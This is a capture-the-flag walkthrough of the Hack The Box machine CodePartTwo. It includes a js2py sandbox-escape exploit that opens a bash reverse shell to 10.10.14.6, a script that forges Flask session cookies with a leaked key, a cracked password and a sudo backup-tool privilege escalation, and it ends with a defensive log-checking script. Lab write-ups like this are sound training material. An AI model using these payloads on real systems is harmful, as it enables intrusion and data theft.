# HTB-CodePartTwo

![image](https://hackmd.io/_uploads/Skgsd3g4Ze.png)

## Nmap

![Pasted image 20251209111640](https://hackmd.io/_uploads/HkL3uhxNZe.png)

Result: ports `22` (SSH) and `8000` (the web application) are open.

Browsing to the web application gives the following page:

![Pasted image 20251209111944](https://hackmd.io/_uploads/Hyoau3eEbe.png)

Clicking `Download` fetches a zip of the app. Unpacking it gives the application source, stored as a `python` file.

![Pasted image 20251209112633](https://hackmd.io/_uploads/SyMJK2e4bl.png)

We will probably need it later; set it aside for now and look at the rest.

![Pasted image 20251209113527](https://hackmd.io/_uploads/SyyxKhxVbe.png)

One thing in the source stands out as important:

```python
app.secret_key = 'S3cr3tK3yC0d3PartTw0'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///users.db'
```

A hardcoded Flask `secret_key` means anyone holding the source can forge or decode the signed session cookie, and the database URI tells us the users live in a SQLite file, `users.db`, next to the app.

![Pasted image 20251209113910](https://hackmd.io/_uploads/SkQ-KneV-g.png)

The requirements file lists the pinned versions in use. Searching those pins shows that `js2py 0.74` is affected by **CVE-2024-28397**, a sandbox escape in js2py: JavaScript evaluated by the library can reach Python objects, and from there `subprocess`.

Back in the app, register an account and log in; the interface looks like this:

![Pasted image 20251209114147](https://hackmd.io/_uploads/HkCGY2gVZe.png)

A public PoC for CVE-2024-28397 exists that reaches a reverse shell through Python's `subprocess.Popen`. The payload used here is that PoC with the callback changed to the attacking machine's IP and port.
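Before moving on to the js2py payload, it is worth making concrete what the hardcoded `secret_key` found above buys an attacker. The block below is an added example (my code, not code from the writeup or from the target app): a minimal re-implementation of the signing scheme Flask uses for its session cookie (itsdangerous' `URLSafeTimedSerializer`: HMAC-SHA1 with a key derived from `secret_key` and the fixed salt `cookie-session`). The session shape `{"user": "marco"}` is hypothetical; against the real app you would first decode your own cookie to learn which keys it stores. Byte-for-byte compatibility with a given itsdangerous release is an assumption; the point that holds regardless is that the cookie is signed, not encrypted, so the leaked key is the only thing that stood between a user and a forged session.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

# Key lifted from the downloaded app source: the only secret in the whole scheme.
SECRET_KEY = b"S3cr3tK3yC0d3PartTw0"
SALT = b"cookie-session"  # fixed salt Flask hands to itsdangerous for session cookies


def _b64e(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _signature(secret: bytes, value: bytes) -> bytes:
    # itsdangerous key_derivation="hmac": signing key = HMAC-SHA1(secret, salt);
    # the cookie body is then authenticated with HMAC-SHA1 under that derived key.
    derived = hmac.new(secret, SALT, hashlib.sha1).digest()
    return _b64e(hmac.new(derived, value, hashlib.sha1).digest())


def _encode_payload(session: dict) -> bytes:
    raw = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:   # itsdangerous only compresses when it saves space
        return b"." + _b64e(compressed)  # a leading "." marks a compressed payload
    return _b64e(raw)


def _decode_payload(payload: bytes) -> dict:
    if payload.startswith(b"."):
        return json.loads(zlib.decompress(_b64d(payload[1:])))
    return json.loads(_b64d(payload))


def sign_session(session: dict, secret: bytes = SECRET_KEY, ts: Optional[int] = None) -> str:
    """Forge a cookie: <payload>.<timestamp>.<signature>, URL-safe base64 without padding."""
    ts = int(time.time()) if ts is None else ts
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    body = _encode_payload(session) + b"." + _b64e(ts_bytes)
    return (body + b"." + _signature(secret, body)).decode()


def peek_session(cookie: str) -> dict:
    """Read the session WITHOUT the key: the payload is signed, never encrypted."""
    body, _, _sig = cookie.encode().rpartition(b".")
    payload, _, _ts = body.rpartition(b".")
    return _decode_payload(payload)


def load_session(cookie: str, secret: bytes = SECRET_KEY) -> Optional[dict]:
    """What the server does: check the signature first, return None on any mismatch."""
    body, _, sig = cookie.encode().rpartition(b".")
    if not hmac.compare_digest(sig, _signature(secret, body)):
        return None
    return peek_session(cookie)


if __name__ == "__main__":
    # Hypothetical session contents; the real keys come from decoding your own cookie.
    forged = sign_session({"user": "marco"})
    print(forged)
    print(load_session(forged))          # accepted: signed with the leaked key
    print(load_session(forged, b"other"))  # None: any other key rejects it
```

`peek_session` needs no key at all, which is why a session cookie must never carry anything the user is not allowed to read; `load_session` only passes when the signature was produced with the same `secret_key`, which is exactly what the leaked constant lets us do.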
```javascript
// CVE-2024-28397 js2py sandbox escape (public PoC); the callback is the attacking machine.
var cmd = "bash -c 'bash -i >& /dev/tcp/10.10.14.6/4446 0>&1'";
var hacked, bymarve, n11;
var getattr, obj;
// Object.getOwnPropertyNames({}) hands back a js2py wrapper around a Python object;
// its __getattribute__ is the door into the Python side.
hacked = Object.getOwnPropertyNames({});
bymarve = hacked.__getattribute__;
n11 = bymarve("__getattribute__");
// Climb to Python's `object` base class so every loaded subclass can be enumerated.
obj = n11("__class__").__base__;
getattr = obj.__getattribute__;
// Recursively search object.__subclasses__() for subprocess.Popen.
function findpopen(o) {
    var result;
    var subs = o.__subclasses__();
    for (var i = 0; i < subs.length; i++) {
        var item = subs[i];
        if (item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item;
        }
        if (item.__name__ != "type" && (result = findpopen(item))) {
            return result;
        }
    }
}
var popen = findpopen(obj);
// Popen(args, bufsize, executable, stdin, stdout, stderr, preexec_fn, close_fds, shell=true)
var out = popen(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
console.log(out);
out;
```

Start a listener on the attacking machine (for example `nc -lvnp 4446`) and run the code in the web app:

![Pasted image 20251209135935](https://hackmd.io/_uploads/rJP8Fhl4Zx.png)

We have a reverse shell. Enumerate the users and the rest of the box: there is a user named `marco`.

![Pasted image 20251209140849](https://hackmd.io/_uploads/r1avFhgNbx.png)

![Pasted image 20251209141831](https://hackmd.io/_uploads/HkquF2e4bx.png)

Next, the database. The app config pointed at `users.db`, so open it with `sqlite3`: it holds the user `marco` and an `MD5` hash of the password. Crack it any way you like (hashcat mode 0, john, or an online lookup, since the hash is unsalted MD5): **sweetangelbabylove**

```shell
# Upgrade the reverse shell to a pty first; ssh will not prompt for a password without one.
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Log in locally as marco, forcing password authentication; type sweetangelbabylove at the prompt.
ssh marco@127.0.0.1 -o PreferredAuthentications=password -o PubkeyAuthentication=no -o StrictHostKeyChecking=no
```

Piping the password in with `printf "sweetangelbabylove\nyes\n" | ssh ...` is not a working substitute: OpenSSH reads the password from the controlling terminal, not from stdin. If `sshpass` happens to be installed, `sshpass -p sweetangelbabylove ssh ...` is the non-interactive equivalent.

![Pasted image 20251209151517](https://hackmd.io/_uploads/S1T3Knl4-e.png)

Logged in as `marco`.

![Pasted image 20251209151906](https://hackmd.io/_uploads/SkVCF2xEZg.png)

`Flag user` obtained.

## Root

![Pasted image 20251209152433](https://hackmd.io/_uploads/B1Seq3xVbx.png)

The sudo rules show the misconfiguration: `marco` can run `npbackup-cli` as root with `NOPASSWD`. The tool takes its configuration from whatever file is passed with `-c`, and the config's `paths` list decides what gets read, as root, into the backup; that covers arbitrary paths, `/root` included, if we put them there. The config sitting in marco's home directory:

```yaml
marco@codeparttwo:~$ cat npbackup.conf
conf_version: 3.0.1
audience: public
repos:
  default:
    repo_uri: __NPBACKUP__wd9051w9Y0p4ZYWmIxMqKHP81/phMlzIOYsL01M9Z7IxNzQzOTEwMDcxLjM5NjQ0Mg8PDw8PDw8PDw8PDw8PD6yVSCEXjl8/9rIqYrh8kIRhlKm4UPcem5kIIFPhSpDU+e+E__NPBACKUP__
    repo_group: default_group
    backup_opts:
      paths:
      - /home/app/app/
      source_type: folder_list
      exclude_files_larger_than: 0.0
    repo_opts:
      repo_password: __NPBACKUP__v2zdDN21b0c7TSeUZlwezkPj3n8wlR9Cu1IJSMrSctoxNzQzOTEwMDcxLjM5NjcyNQ8PDw8PDw8PDw8PDw8PD0z8n8DrGuJ3ZVWJwhBl0GHtbaQ8lL3fB0M=__NPBACKUP__
      retention_policy: {}
      prune_max_unused: 0
    prometheus: {}
    env: {}
    is_protected: false
groups:
  default_group:
    backup_opts:
      paths: []
      source_type:
      stdin_from_command:
      stdin_filename:
      tags: []
      compression: auto
      use_fs_snapshot: true
      ignore_cloud_files: true
      one_file_system: false
      priority: low
      exclude_caches: true
      excludes_case_ignore: false
      exclude_files:
      - excludes/generic_excluded_extensions
      - excludes/generic_excludes
      - excludes/windows_excludes
      - excludes/linux_excludes
      exclude_patterns: []
      exclude_files_larger_than:
      additional_parameters:
      additional_backup_only_parameters:
      minimum_backup_size_error: 10 MiB
      pre_exec_commands: []
      pre_exec_per_command_timeout: 3600
      pre_exec_failure_is_fatal: false
      post_exec_commands: []
      post_exec_per_command_timeout: 3600
      post_exec_failure_is_fatal: false
      post_exec_execute_even_on_backup_error: true
      post_backup_housekeeping_percent_chance: 0
      post_backup_housekeeping_interval: 0
    repo_opts:
      repo_password:
      repo_password_command:
      minimum_backup_age: 1440
      upload_speed: 800 Mib
      download_speed: 0 Mib
      backend_connections: 0
      retention_policy:
        last: 3
        hourly: 72
        daily: 30
        weekly: 4
        monthly: 12
        yearly: 3
        tags: []
        keep_within: true
        group_by_host: true
        group_by_tags: true
        group_by_paths: false
        ntp_server:
      prune_max_unused: 0 B
      prune_max_repack_size:
    prometheus:
      backup_job: ${MACHINE_ID}
      group: ${MACHINE_GROUP}
    env:
      env_variables: {}
      encrypted_env_variables: {}
    is_protected: false
identity:
  machine_id: ${HOSTNAME}__blw0
  machine_group:
global_prometheus:
  metrics: false
  instance: ${MACHINE_ID}
  destination:
  http_username:
  http_password:
  additional_labels: {}
  no_cert_verify: false
global_options:
  auto_upgrade: false
  auto_upgrade_percent_chance: 5
  auto_upgrade_interval: 15
  auto_upgrade_server_url:
  auto_upgrade_server_username:
  auto_upgrade_server_password:
  auto_upgrade_host_identity: ${MACHINE_ID}
  auto_upgrade_group: ${MACHINE_GROUP}
```

(The indentation above is reconstructed; the file was flattened when pasted.) The parts that matter for us: `repos.default.backup_opts.paths` is the list of directories the root process reads, `repo_uri` and `repo_password` are stored in npbackup's obfuscated `__NPBACKUP__...__NPBACKUP__` form that the tool decodes itself, and the group defaults also expose `pre_exec_commands` / `post_exec_commands` hooks. Everything in this file is under marco's control, and sudo runs the tool as root with it.

Running a backup with the config as-is:

```shell
marco@codeparttwo:~$ sudo npbackup-cli -c npbackup.conf -b -f
2025-12-09 08:30:27,661 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-12-09 08:30:27,680 :: INFO :: Loaded config 4E3B3BFD in /home/marco/npbackup.conf
2025-12-09 08:30:27,687 :: INFO :: Running backup of ['/home/app/app/'] to repo default
2025-12-09 08:30:28,722 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excluded_extensions
2025-12-09 08:30:28,723 :: ERROR :: Exclude file 'excludes/generic_excluded_extensions' not found
2025-12-09 08:30:28,723 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/generic_excludes
2025-12-09 08:30:28,723 :: ERROR :: Exclude file 'excludes/generic_excludes' not found
2025-12-09 08:30:28,723 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/windows_excludes
2025-12-09 08:30:28,723 :: ERROR :: Exclude file 'excludes/windows_excludes' not found
2025-12-09 08:30:28,723 :: INFO :: Trying to expanding exclude file path to /usr/local/bin/excludes/linux_excludes
2025-12-09 08:30:28,723 :: ERROR :: Exclude file 'excludes/linux_excludes' not found
2025-12-09 08:30:28,723 :: WARNING :: Parameter --use-fs-snapshot was given, which is only compatible with Windows
no parent snapshot found, will read all files

Files:          12 new,     0 changed,     0 unmodified
Dirs:            9 new,     0 changed,     0 unmodified
Added to the repository: 34.053 KiB (19.490 KiB stored)

processed 12 files, 48.965 KiB in 0:00
snapshot 7ce730bf saved
2025-12-09 08:30:29,574 :: INFO :: Backend finished with success
2025-12-09 08:30:29,575 :: INFO :: Processed 49.0 KiB of data
2025-12-09 08:30:29,576 :: ERROR :: Backup is smaller than configured minmium backup size
2025-12-09 08:30:29,576 :: ERROR :: Operation finished with failure
2025-12-09 08:30:29,576 :: INFO :: Runner took 1.889526 seconds for backup
2025-12-09 08:30:29,576 :: INFO :: Operation finished
2025-12-09 08:30:29,580 :: INFO :: ExecTime = 0:00:01.921126, finished, state is: errors.
```

Three things to read out of that output. The process is `running as root` and loads its config from `/home/marco/npbackup.conf`, a file marco owns. The missing exclude files and the `--use-fs-snapshot` warning (a Windows-only option) are noise. And the final `Operation finished with failure` is only the post-check against `minimum_backup_size_error: 10 MiB` complaining that 49 KiB is too small; `snapshot 7ce730bf saved` and `Backend finished with success` show the data was written to the repository anyway, so the same run with `/root` in `paths` would read root's files into a repository whose URI and password sit in a file we control.
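To turn the observations above into something reusable on the defensive side, here is an added example (my code, not the writeup's and not part of npbackup): a small parser for the `npbackup-cli` log format that flags the two conditions visible in the run above, the tool running as root while loading its config from a user-writable location, and backup `paths` that cover data only root should read. The first sample is constructed from the log lines above; the second, with `paths` pointed at `/root/`, is a hypothetical run that the writeup does not show. The prefix lists are assumptions to tune per host.

```python
from __future__ import annotations

import ast
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: the relevant lines of the npbackup-cli run shown above.
SAMPLE_RUN = """\
2025-12-09 08:30:27,661 :: INFO :: npbackup 3.0.1-linux-UnknownBuildType-x64-legacy-public-3.8-i 2025032101 - Copyright (C) 2022-2025 NetInvent running as root
2025-12-09 08:30:27,680 :: INFO :: Loaded config 4E3B3BFD in /home/marco/npbackup.conf
2025-12-09 08:30:27,687 :: INFO :: Running backup of ['/home/app/app/'] to repo default
2025-12-09 08:30:29,574 :: INFO :: Backend finished with success
"""

# Hypothetical: the same run after `paths:` has been pointed at /root/ (not a run from the writeup).
ROOT_RUN = SAMPLE_RUN.replace("['/home/app/app/']", "['/root/']")

CONFIG_RE = re.compile(r"Loaded config \w+ in (?P<path>\S+)")
PATHS_RE = re.compile(r"Running backup of (?P<paths>\[.*?\]) to repo (?P<repo>\S+)")

# Assumed lists; adjust to the host. Data only root should be reading:
SENSITIVE_PREFIXES = ("/root", "/etc/shadow", "/etc/sudoers", "/var/lib/")
# Places an unprivileged user can write; a root run loading its config from here is suspect:
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class NpbackupRun:
    as_root: bool = False
    config_path: Optional[str] = None
    paths: List[str] = field(default_factory=list)
    repo: Optional[str] = None
    succeeded: bool = False


def parse_npbackup_log(text: str) -> NpbackupRun:
    """Pull the security-relevant facts out of one npbackup-cli run ('ts :: LEVEL :: message')."""
    run = NpbackupRun()
    for line in text.splitlines():
        msg = line.split(" :: ", 2)[-1]          # drop timestamp and level
        if msg.endswith("running as root"):
            run.as_root = True
        elif (m := CONFIG_RE.search(msg)):
            run.config_path = m.group("path")
        elif (m := PATHS_RE.search(msg)):
            run.paths = list(ast.literal_eval(m.group("paths")))  # logged as a Python list literal
            run.repo = m.group("repo")
        elif "Backend finished with success" in msg:
            run.succeeded = True
    return run


def assess(run: NpbackupRun) -> List[str]:
    """Return one finding per dangerous condition; an empty list means nothing to report."""
    findings: List[str] = []
    if run.as_root and run.config_path and run.config_path.startswith(USER_WRITABLE_PREFIXES):
        findings.append(f"root run with config from user-writable location: {run.config_path}")
    for path in run.paths:
        if path.startswith(SENSITIVE_PREFIXES):
            findings.append(f"backup path covers sensitive data: {path}")
    return findings


if __name__ == "__main__":
    for label, text in (("as shown", SAMPLE_RUN), ("paths -> /root/", ROOT_RUN)):
        run = parse_npbackup_log(text)
        print(label, run.paths, "->", assess(run) or "clean")
```

The first rule already fires on the run exactly as the writeup shows it, before any path has been changed: root executing a backup whose config it does not own is the misconfiguration, and it is visible in the tool's own log. Note that the `succeeded` flag comes from `Backend finished with success`, not from the later `Operation finished with failure`, which is only the minimum-size post-check.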